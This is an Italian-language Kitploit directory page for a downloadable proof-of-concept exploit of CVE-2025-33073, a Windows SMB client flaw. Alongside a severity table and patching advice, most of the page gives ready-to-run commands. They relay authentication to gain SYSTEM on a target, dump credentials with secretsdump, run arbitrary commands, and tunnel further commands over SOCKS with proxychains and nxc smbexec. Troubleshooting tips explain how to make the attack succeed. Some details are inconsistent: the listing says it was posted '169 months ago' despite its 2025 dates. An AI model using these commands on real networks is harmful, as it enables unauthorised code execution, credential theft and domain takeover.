Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Blackash-CVE-2025-33073 — CVE-2025-33073 | Kitploit
Strumenti/GitHubGitHub/irjfifndn-prog/blackash-cve-2025-33073
Analisi delle VulnerabilitàExploitMovimento LateralePenetration TestingCommand and ControlRed TeamingSviluppo Payload
GitHubirjfifndn-prog/blackash-cve-2025-33073

Blackash-CVE-2025-33073

CVE-2025-33073

Vedi Repository
169 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

✨ CVE-2025-33073: Vulnerabilità RCE SMB di Windows 🚨

🔥 Esecuzione Remota di Codice Autenticata ad Alta Severità 🔥 Controllo di Accesso Inappropriato nel Client SMB di Windows (CWE-284)


🛡️ Dettagli Chiave a Colpo d'Occhio

Scarica lo strumento
AspettoDettagli
Punteggio CVSS v3.18.8 (Alto) 🔥
Sistemi InteressatiWindows 10, 11, Server 2012–2025 (tutte le edizioni) 💻
Data di Divulgazione10 giugno 2025 📅 (Corretto nel Patch Tuesday di giugno 2025)
SfruttamentoSfruttato attivamente in natura 😱
Aggiunto al CISA KEV il 21 ottobre 2025
Vettore di AttaccoRete (Autenticato) 🌐
ImpattoEsecuzione di codice a livello SYSTEM 👑
Movimento laterale tramite relay Kerberos
BypassMitigazioni di riflessione NTLM ⚡

🛠️ Mitigazioni Immediate

  1. Applica la patch ora! 🔧
    → Applica gli aggiornamenti Microsoft (es. KB5060998)
    → Guida agli Aggiornamenti Microsoft 🔗

  2. Abilita la firma SMB ✍️
    → Impila su tutti i client e server
    → Set-SmbClientConfiguration -RequireSecuritySignature $true

  3. Limita NTLM 🚫
    → Blocca NTLM dove possibile
    → Monitora i tentativi di relay con strumenti EDR

  4. Correzione automatica? 🤖
    → Usa Vicarius vRx o script personalizzati per la correzione di massa


⚠️ Perché è Importante

  • Bypassa le protezioni NTLM tradizionali 🛑
  • Funziona anche con la firma SMB non imposta
  • Consente il takeover completo del dominio in ambienti AD mal configurati 🏰

Stato al 15 novembre 2025:
✅ Corretto
❌ Ancora sfruttato in sistemi non aggiornati
🔔 Scadenza CISA: 10 novembre 2025 ⏰


⚠️ Esempio di utilizzo

GUI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65
454875044-83ce744a-161e-4c0f-9f2d-6d57f23a913c

CLI

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only
455126200-fff4fcde-0a93-43c9-b93e-990554ccb689

Comando personalizzato Invece di eseguire secretsdump, è possibile eseguire un comando personalizzato.

root@kitploit:~
sudo python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"
455135898-1a054df7-ba08-4c9c-a4cf-737eb0827534

SOCKS Per un'esecuzione più furtiva dei comandi dopo aver stabilito una connessione valida come SYSTEM. --target e --target-ip dovrebbero essere uguali qui.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks
455140618-8cf77803-f417-4abe-a993-746049b2634c

Inoltre, un comando personalizzato può essere eseguito tramite proxychains invece di scaricare SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec
455140896-6ecf0e32-ccd2-4a61-a024-644b214607ea

Sfruttamento manuale senza requisiti DNS

Se ti trovi nello stesso dominio broadcast del dispositivo ed è vulnerabile all'avvelenamento LLMNR, è possibile sfruttare un dispositivo senza dover registrare un record DNS.

455277712-20c81ea0-88bf-4334-98aa-d2cb93f473b1

Risoluzione dei problemi:

  • A volte l'attacco non funziona perché viene utilizzato l'hostname per l'attacco, il che comporta una query DNS da Kali. Se Kali non sta usando il server DNS o ricevi un messaggio '/ FAILED' da impacket-ntlmrelayx, prova ad aggiungere l'host al file /etc/hosts. Ciò dovrebbe far funzionare l'attacco.

  • Se si utilizza l'IP, l'attacco dovrebbe funzionare. A volte eseguirlo più volte porta a un SUCCESSO invece che a un fallimento. Fino ad ora non è perfettamente chiaro perché ciò accada. Penso abbia a che fare con il networking.

  • Prova un altro metodo di coercizione usando -M o --method.


Wireshark:

Autenticazione NTLM locale avvenuta

455252866-0a3fe643-2d52-427a-91f2-991770732f62

Autenticazione NTLM locale non avvenuta, risultante in un tentativo FALLITO

455252901-7f6e900a-1c5b-4bc6-b5ae-79dbbe3f7348

Da sapere:

  • xterm consente di copiare e incollare con il pulsante centrale del mouse.
  • Il record DNS dovrebbe essere noto anche al client, in alcune occasioni può richiedere più tempo. Con più tempo intendo dargli un paio di minuti.
  • Questo è solo un PoC, il che significa che non sono stati tentati bypass di AV/EDR. Usalo a tuo rischio.

Non aspettare — applica la patch oggi! 🛑
La sicurezza della tua rete dipende da questo. 💪